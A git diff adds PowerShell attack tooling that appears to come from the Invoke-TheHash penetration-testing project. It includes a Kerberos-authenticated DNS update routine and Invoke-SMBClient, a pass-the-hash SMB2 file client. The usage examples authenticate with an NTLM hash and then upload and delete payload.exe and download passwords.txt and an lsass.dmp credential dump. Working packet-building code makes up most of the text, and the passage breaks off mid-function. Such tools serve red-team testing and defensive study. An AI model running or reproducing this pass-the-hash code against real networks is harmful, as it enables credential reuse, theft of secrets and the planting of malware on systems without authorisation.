+ $kerberos_client_stream.Close()
+ }
+ else
+ {
+
+ try
+ {
+
+ $Null = [System.Reflection.Assembly]::LoadWithPartialName("System.IdentityModel")
+
+ if($username)
+ {
+ $creds = New-Object System.Management.Automation.PSCredential ($username,$Password)
+ $network_creds = $creds.GetNetworkCredential()
+ $network_creds.Domain = $domain
+ $token = New-Object System.IdentityModel.Selectors.KerberosSecurityTokenProvider ("DNS/$DomainController",[System.Security.Principal.TokenImpersonationLevel]::Impersonation,$network_creds)
+ $ticket = $token.GetToken([System.TimeSpan]::FromMinutes(1))
+ }
+ else
+ {
+ $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ("DNS/$DomainController")
+ }
+
+ $asrep_key = $ticket.SecurityKey.GetSymmetricKey()
+ $kerberos_client_receive = $Ticket.GetRequest()
+ $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
+ $asrep_payload = $asrep_payload -replace "-",""
+ }
+ catch
+ {
+ $auth_success = $false
+ }
+
+ }
+
+ if($asrep_key -or ($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302010B*'))
+ {
+ Write-Verbose "[+] Kerberos preauthentication successful"
+ $auth_success = $true
+ }
+ elseif($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302011E*')
+ {
+ Write-Output ("[-] Kerberos preauthentication error 0x" + $asrep_payload.Substring(96,2))
+ $auth_success = $false
+ }
+ else
+ {
+ Write-Output "[-] Kerberos authentication failure"
+ $auth_success = $false
+ }
+
+ if($auth_success)
+ {
+ $ticket_index = $asrep_payload.IndexOf("A003020112A1030201")
+ $ticket_kvno = $kerberos_client_receive[($ticket_index / 2 + 9)]
+
+ if($asrep_payload.Substring($ticket_index + 22,2) -eq '82')
+ {
+ $ticket_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($ticket_index / 2 + 13)..($ticket_index / 2 + 12)],0)) - 4
+ }
+ else
+ {
+ $ticket_length = $kerberos_client_receive[($ticket_index / 2 + 12)] - 3
+ }
+
+ $ticket = $Kerberos_client_receive[($ticket_index / 2 + 18)..($ticket_index/2 + 17 + $ticket_length)]
+
+ if($kerberos_tcpclient)
+ {
+ $cipher_index = $asrep_payload.Substring($ticket_index + 1).IndexOf("A003020112A1030201") + $ticket_index + 1
+
+ if($asrep_payload.Substring($cipher_index + 22,2) -eq '82')
+ {
+ $cipher_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($cipher_index / 2 + 13)..($cipher_index / 2 + 12)],0)) - 4
+ }
+ else
+ {
+ $cipher_length = $kerberos_client_receive[($cipher_length / 2 + 12)] - 3
+ }
+
+ $cipher = $kerberos_client_receive[($cipher_index / 2 + 18)..($cipher_index / 2 + 17 + $cipher_length)]
+ $ke_key = Get-KerberosAES256UsageKey encrypt 3 $base_key
+ $asrep_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
+ $kerberos_session_key = $asrep_cleartext[37..68]
+ $ke_key = Get-KerberosAES256UsageKey encrypt 11 $kerberos_session_key
+ $ki_key = Get-KerberosAES256UsageKey integrity 11 $kerberos_session_key
+ [Byte[]]$subkey = New-RandomByteArray 32
+ [Byte[]]$sequence_number = New-RandomByteArray 4
+ $packet_authenticator = New-KerberosAuthenticator $kerberos_realm $kerberos_username $subkey $sequence_number
+ [Byte[]]$authenticator = ConvertFrom-PacketOrderedDictionary $packet_authenticator
+ $authenticator = (New-RandomByteArray 16) + $authenticator
+ $authenticator_encrypted = Protect-KerberosAES256CTS $ke_key $authenticator
+ $authenticator_signature = Get-KerberosHMACSHA1 $ki_key $authenticator
+ $packet_apreq = New-PacketKerberosAPREQ $kerberos_realm $domain_controller $ticket_kvno $ticket $authenticator_encrypted $authenticator_signature
+ [Byte[]]$apreq = ConvertFrom-PacketOrderedDictionary $packet_apreq
+ [Byte[]]$mac_flags = 0x04
+ }
+ else
+ {
+ [Byte[]]$apreq = $kerberos_client_receive
+ [Byte[]]$mac_flags = 0x00
+ }
+
+ $packet_DNSQuery = New-PacketDNSQuery $tkey_name 0x00,0xf9 $apreq
+ $DNSQueryTKEY = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ }
+ catch
+ {
+ Write-Output "$DomainController did not respond on TCP port 53"
+ }
+
+ if($DNS_client.Connected)
+ {
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ $DNS_client_send = $DNSQueryTKEY
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $tkey_payload = [System.BitConverter]::ToString($DNS_client_receive)
+ $tkey_payload = $tkey_payload -replace "-",""
+
+ if($tkey_payload.Substring(8,4) -eq '8000')
+ {
+ Write-Verbose "[+] Kerberos TKEY query successful"
+ $TKEY_success = $true
+ }
+ else
+ {
+ Write-Output ("[-] Kerberos TKEY query error 0x" + $tkey_payload.Substring(8,4))
+ $TKEY_success = $false
+ }
+
+ if($TKEY_success)
+ {
+
+ if($kerberos_tcpclient)
+ {
+ $cipher_index = $tkey_payload.IndexOf("A003020112A2")
+ $cipher_length = $DNS_client_receive[($cipher_index / 2 + 8)]
+ $cipher = $DNS_client_receive[($cipher_index / 2 + 9)..($cipher_index / 2 + 8 + $cipher_length)]
+ $ke_key = Get-KerberosAES256UsageKey encrypt 12 $kerberos_session_key
+ $tkey_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
+ $acceptor_subkey = $tkey_cleartext[59..90]
+ }
+ else
+ {
+ $sequence_index = $tkey_payload.IndexOf("FFFFFFFFFF00000000")
+ $sequence_number = $DNS_client_receive[($sequence_index / 2 + 9)..($sequence_index / 2 + 12)]
+ $acceptor_subkey = $asrep_key
+ }
+
+ $kc_key = Get-KerberosAES256UsageKey checksum 25 $acceptor_subkey
+ $time_signed = [Int](([DateTime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
+ $time_signed = [System.BitConverter]::GetBytes($time_signed)
+ $time_signed = 0x00,0x00 + $time_signed[3..0]
+ [Byte[]]$transaction_id = New-RandomByteArray 2
+ $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name
+ [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
+ $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number
+ [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
+ $DNSUpdateTSIG += $DNSUpdateMAC
+ $checksum = Get-KerberosHMACSHA1 $kc_key $DNSUpdateTSIG
+ $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number $checksum
+ [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
+ $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name $DNSUpdateMAC
+ [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
+ $DNS_client_send = $DNSUpdateTSIG
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
+ Write-Output $DNS_update_response_status
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+}
diff --git a/Invoke-SMBClient.ps1 b/Invoke-SMBClient.ps1
new file mode 100644
index 0000000..1db92e5
--- /dev/null
+++ b/Invoke-SMBClient.ps1
@@ -0,0 +1,2773 @@
+function Invoke-SMBClient
+{
+<#
+.SYNOPSIS
+Invoke-SMBClient performs basic file share tasks with pass the hash. This module supports SMB2 (2.1) only with and
+without SMB signing. Note that this client is slow compared to the Windows client.
+
+.PARAMETER Username
+Username to use for authentication.
+
+.PARAMETER Domain
+Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the
+username.
+
+.PARAMETER Hash
+NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format.
+
+.Parameter Action
+Default = List: (List/Recurse/Delete/Get/Put) Action to perform.
+List: Lists the contents of a directory.
+Recurse: Lists the contents of a directory and all subdirectories.
+Delete: Deletes a file.
+Get: Downloads a file.
+Put: Uploads a file and sets the creation, access, and last write times to match the source file.
+
+.PARAMETER Source
+List and Recurse: UNC path to a directory.
+Delete: UNC path to a file.
+Get: UNC path to a file.
+Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the
+'Modify' switch, 'Source' must be a byte array.
+
+.PARAMETER Destination
+List and Recurse: Not used.
+Delete: Not used.
+Get: If used, value will be the new filename of downloaded file. If a full path is not specified, the file will be
+created in the current directory.
+Put: UNC path for uploaded file. The filename must be specified.
+
+.PARAMETER Modify
+List and Recurse: The function will output an object consisting of directory contents.
+Delete: Not used.
+Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's
+advisable to use this only with smaller files and to send the output to a variable.
+Put: Uploads a byte array to a new destination file.
+
+.PARAMETER NoProgress
+List and Recurse: Not used.
+Delete: Not used.
+Get and Put: Prevents displaying of a progress bar.
+
+.PARAMETER Sleep
+Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try increasing this
+if downloaded files are being corrupted.
+
+.PARAMETER Session
+Inveigh-Relay authenticated session.
+
+.EXAMPLE
+List the contents of a root share directory.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\server\share -verbose
+
+.EXAMPLE
+Recursively list the contents of a share starting at the root.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share
+
+.EXAMPLE
+Recursively list the contents of a share subdirectory and return only the contents output to a variable.
+$directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\server\share\subdirectory -Modify
+
+.EXAMPLE
+Delete a file on a share.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\payload.exe
+
+.EXAMPLE
+Delete a file in subdirectories within a share.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\server\share\subdirectory\subdirectory\payload.exe
+
+.EXAMPLE
+Download a file from a share.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\passwords.txt
+
+.EXAMPLE
+Download a file from within a share subdirectory and set a new filename.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\subdirectory\lsass.dmp -Destination server_lsass.dmp
+
+.EXAMPLE
+Download a file from a share to a byte array variable instead of disk.
+[Byte[]]$password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\server\share\passwords.txt -Modify
+[System.Text.Encoding]::UTF8.GetString($password_file)
+
+.EXAMPLE
+Upload a file to a share subdirectory.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source payload.exe -Destination \\server\share\subdirectory\payload.exe
+
+.EXAMPLE
+Upload a file to share from a byte array variable.
+Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\server\share\file.docx -Modify
+
+.EXAMPLE
+List the contents of a share directory using an authenticated Inveigh-Relay session.
+Invoke-SMBClient -Session 1 -Source \\server\share
+
+.LINK
+https://github.com/Kevin-Robertson/Invoke-TheHash
+
+#>
+[CmdletBinding(DefaultParametersetName='Default')]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("List","Recurse","Get","Put","Delete")][String]$Action = "List",
+ [parameter(Mandatory=$false)][String]$Destination,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][String]$Username,
+ [parameter(ParameterSetName='Default',Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$true)][Object]$Source,
+ [parameter(ParameterSetName='Default',Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash,
+ [parameter(Mandatory=$false)][Switch]$Modify,
+ [parameter(Mandatory=$false)][Switch]$NoProgress,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Int]$Session,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Logoff,
+ [parameter(ParameterSetName='Session',Mandatory=$false)][Switch]$Refresh,
+ [parameter(Mandatory=$false)][Int]$Sleep=100
+)
+
+function ConvertFrom-PacketOrderedDictionary
+{
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+}
+
+#NetBIOS
+
+function New-PacketNetBIOSSessionService
+{
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+}
+
+#SMB1
+
+function New-PacketSMBHeader
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("Command",$packet_command)
+ $packet_SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Flags",$packet_flags)
+ $packet_SMBHeader.Add("Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+}
+
+function New-PacketSMBNegotiateProtocolRequest
+{
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+}
+
+#SMB2
+
+function New-PacketSMB2Header
+{
+ param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID)
+
+ [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00
+
+ $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $packet_SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $packet_SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $packet_SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2Header.Add("Command",$packet_command)
+ $packet_SMB2Header.Add("CreditRequest",$packet_credit_request)
+ $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("MessageID",$packet_message_ID)
+ $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2Header.Add("TreeID",$packet_tree_ID)
+ $packet_SMB2Header.Add("SessionID",$packet_session_ID)
+ $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $packet_SMB2Header
+}
+
+function New-PacketSMB2NegotiateProtocolRequest
+{
+ $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect",[Byte[]](0x02,0x02))
+ $packet_SMB2NegotiateProtocolRequest.Add("Dialect2",[Byte[]](0x10,0x02))
+
+ return $packet_SMB2NegotiateProtocolRequest
+}
+
+function New-PacketSMB2SessionSetupRequest
+{
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2SessionSetupRequest.Add("StructureSize",[Byte[]](0x19,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityMode",[Byte[]](0x01))
+ $packet_SMB2SessionSetupRequest.Add("Capabilities",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Channel",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferOffset",[Byte[]](0x58,0x00))
+ $packet_SMB2SessionSetupRequest.Add("SecurityBufferLength",$packet_security_blob_length)
+ $packet_SMB2SessionSetupRequest.Add("PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2SessionSetupRequest.Add("Buffer",$packet_security_blob)
+
+ return $packet_SMB2SessionSetupRequest
+}
+
+function New-PacketSMB2TreeConnectRequest
+{
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2TreeConnectRequest.Add("StructureSize",[Byte[]](0x09,0x00))
+ $packet_SMB2TreeConnectRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathOffset",[Byte[]](0x48,0x00))
+ $packet_SMB2TreeConnectRequest.Add("PathLength",$packet_path_length)
+ $packet_SMB2TreeConnectRequest.Add("Buffer",$packet_path)
+
+ return $packet_SMB2TreeConnectRequest
+}
+
+function New-PacketSMB2IoctlRequest
+{
+ param([Byte[]]$packet_file_name)
+
+ $packet_file_name_length = [System.BitConverter]::GetBytes($packet_file_name.Length + 2)
+
+ $packet_SMB2IoctlRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2IoctlRequest.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2IoctlRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("Function",[Byte[]](0x94,0x01,0x06,0x00))
+ $packet_SMB2IoctlRequest.Add("GUIDHandle",[Byte[]](0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff))
+ $packet_SMB2IoctlRequest.Add("InData_Offset",[Byte[]](0x78,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("InData_Length",$packet_file_name_length)
+ $packet_SMB2IoctlRequest.Add("MaxIoctlInSize",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("OutData_Offset",[Byte[]](0x78,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("OutData_Length",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("MaxIoctlOutSize",[Byte[]](0x00,0x10,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("Flags",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMB2IoctlRequest.Add("InData_MaxReferralLevel",[Byte[]](0x04,0x00))
+ $packet_SMB2IoctlRequest.Add("InData_FileName",$packet_file_name)
+
+ return $packet_SMB2IoctlRequest
+}
+
+function New-PacketRAPNetShareEnum
+{
+ param([String]$packet_server_UNC)
+
+ $packet_RAPNetShareEnum = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_ReferentID",[Byte[]](0x00,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_MaxCount",$packet_MaxCount)
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_Offset",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_ActualCount",$packet_MaxCount)
+ $packet_RAPNetShareEnum.Add("PointerToServerUNC_MaxCount",$packet_server_UNC)
+ $packet_RAPNetShareEnum.Add("PointerToLevel_Level",[Byte[]](0x01,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Ctr",[Byte[]](0x01,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_ReferentID",[Byte[]](0x04,0x00,0x02,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_Ctr1_Count",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RAPNetShareEnum.Add("PointerToCtr_NetShareCtr_Pointer_NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_RAPNetShareEnum.Add("MaxBuffer",[Byte[]](0xff,0xff,0xff,0xff))
+ $packet_RAPNetShareEnum.Add("NullPointer",[Byte[]](0x00,0x00,0x00,0x00))
+
+ return $packet_RAPNetShareEnum
+}
+
+function New-PacketSMB2CreateRequest
+{
+ param([Byte[]]$packet_file_name,[Int]$packet_extra_info,[Int64]$packet_allocation_size)
+
+ if($packet_file_name)
+ {
+ $packet_file_name_length = [System.BitConverter]::GetBytes($packet_file_name.Length)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+ }
+ else
+ {
+ $packet_file_name = 0x00,0x00,0x69,0x00,0x6e,0x00,0x64,0x00
+ $packet_file_name_length = 0x00,0x00
+ }
+
+ if($packet_extra_info)
+ {
+ [Byte[]]$packet_desired_access = 0x80,0x00,0x10,0x00
+ [Byte[]]$packet_file_attributes = 0x00,0x00,0x00,0x00
+ [Byte[]]$packet_share_access = 0x00,0x00,0x00,0x00
+ [Byte[]]$packet_create_options = 0x21,0x00,0x00,0x00
+ [Byte[]]$packet_create_contexts_offset = [System.BitConverter]::GetBytes($packet_file_name.Length)
+
+ if($packet_extra_info -eq 1)
+ {
+ [Byte[]]$packet_create_contexts_length = 0x58,0x00,0x00,0x00
+ }
+ elseif($packet_extra_info -eq 2)
+ {
+ [Byte[]]$packet_create_contexts_length = 0x90,0x00,0x00,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_create_contexts_length = 0xb0,0x00,0x00,0x00
+ [Byte[]]$packet_allocation_size_bytes = [System.BitConverter]::GetBytes($packet_allocation_size)
+ }
+
+ if($packet_file_name)
+ {
+
+ [String]$packet_file_name_padding_check = $packet_file_name.Length / 8
+
+ if($packet_file_name_padding_check -like "*.75")
+ {
+ $packet_file_name += 0x04,0x00
+ }
+ elseif($packet_file_name_padding_check -like "*.5")
+ {
+ $packet_file_name += 0x00,0x00,0x00,0x00
+ }
+ elseif($packet_file_name_padding_check -like "*.25")
+ {
+ $packet_file_name += 0x00,0x00,0x00,0x00,0x00,0x00
+ }
+
+ }
+
+ [Byte[]]$packet_create_contexts_offset = [System.BitConverter]::GetBytes($packet_file_name.Length + 120)
+
+ }
+ else
+ {
+ [Byte[]]$packet_desired_access = 0x03,0x00,0x00,0x00
+ [Byte[]]$packet_file_attributes = 0x80,0x00,0x00,0x00
+ [Byte[]]$packet_share_access = 0x01,0x00,0x00,0x00
+ [Byte[]]$packet_create_options = 0x40,0x00,0x00,0x00
+ [Byte[]]$packet_create_contexts_offset = 0x00,0x00,0x00,0x00
+ [Byte[]]$packet_create_contexts_length = 0x00,0x00,0x00,0x00
+ }
+
+ $packet_SMB2CreateRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMB2CreateRequest.Add("StructureSize",[Byte[]](0x39,0x00))
+ $packet_SMB2CreateRequest.Add("Flags",[Byte[]](0x00))
+ $packet_SMB2CreateRequest.Add("RequestedOplockLevel",[Byte[]](0x00))
+ $packet_SMB2CreateRequest.Add("Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("DesiredAccess",$packet_desired_access)
+ $packet_SMB2CreateRequest.Add("FileAttributes",$packet_file_attributes)
+ $packet_SMB2CreateRequest.Add("ShareAccess",$packet_share_access)
+ $packet_SMB2CreateRequest.Add("CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMB2CreateRequest.Add("CreateOptions",$packet_create_options)
+ $packet_SMB2CreateRequest.Add("NameOffset",[Byte[]](0x78,0x00))
+ $packet_SMB2CreateRequest.Add("NameLength",$packet_file_name_length)
+ $packet_SMB2CreateRequest.Add("CreateContextsOffset",$packet_create_contexts_offset)
+ $packet_SMB2CreateRequest.Add("CreateContextsLength",$packet_create_contexts_length)
+ $packet_SMB2CreateRequest.Add("Buffer",$packet_file_name)
+
+ if($packet_extra_info)
+ {
+ $packet_SMB2CreateRequest.Add("ExtraInfo_ChainElementDHnQ_ChainOffset",[Byte[]](0x28,0x00,0x00,0x00))
